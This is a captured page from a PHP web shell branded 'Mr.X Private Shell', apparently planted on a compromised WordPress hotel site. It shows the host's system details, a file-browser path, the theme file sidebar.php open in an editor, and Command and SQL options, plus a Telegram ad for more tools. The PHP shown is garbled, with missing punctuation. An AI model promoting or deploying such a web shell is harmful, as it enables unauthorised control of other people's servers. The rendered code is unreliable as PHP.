Uname: Linux webm005.cluster107.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
User: 6036 (villadal)
Group: 100 (users)
Disabled functions: NONE
Safe mode: On[ PHPinfo ]
//home/villadal/www/old///////wp-content/themes/B&B Villa Dalegno      ( Reset | Go to )
File Name: sidebar.php
Edit
<?php

global $smof_data//fetch options stored in $smof_data

    //Left sidebar
    
if (is_page_template('page-templates/template-left-sidebar.php') ) {
        echo 
'<div class="sidebar left-sidebar">';
            
dynamic_sidebar'primary-widget-area' );
        echo 
'</div>';
    } 
    
    
//Right sidebar
    
elseif (is_page_template('page-templates/template-right-sidebar.php') ) {
        echo 
'<div class="sidebar right-sidebar">';
            
dynamic_sidebar'primary-widget-area' );
        echo 
'</div>';
    } 
    
    
//No sidebar
    
elseif (is_page_template('template-full-width.php') ) {
        echo 
'';
    }
    
    elseif (
$smof_data['sidebar_position']) {
        
        
$position $smof_data['sidebar_position'];

        
//Left sidebar
        
if ( $position == 'left' or is_page_template('page-templates/template-left-sidebar.php') ) {
            echo 
'<div class="sidebar left-sidebar">';
                
dynamic_sidebar'primary-widget-area' );
            echo 
'</div>';
        } 

        
//Right sidebar
        
elseif ( $position == 'right' or is_page_template('page-templates/template-right-sidebar.php') ) {
            echo 
'<div class="sidebar right-sidebar">';
                
dynamic_sidebar'primary-widget-area' );
            echo 
'</div>';
        } 

        
//No sidebar
        
elseif ( $position == 'none' or is_page_template('template-full-width.php') ) {
            echo 
'';
        }
        
    }

    else { 
        echo 
'<div class="sidebar right-sidebar">';
            
dynamic_sidebar'primary-widget-area' );
        echo 
'</div>';
    }

?>

All system for education purposes only. For more tools: Telegram @jackleet

Mr.X Private Shell

Logo
-
New File | New Folder
Command
SQL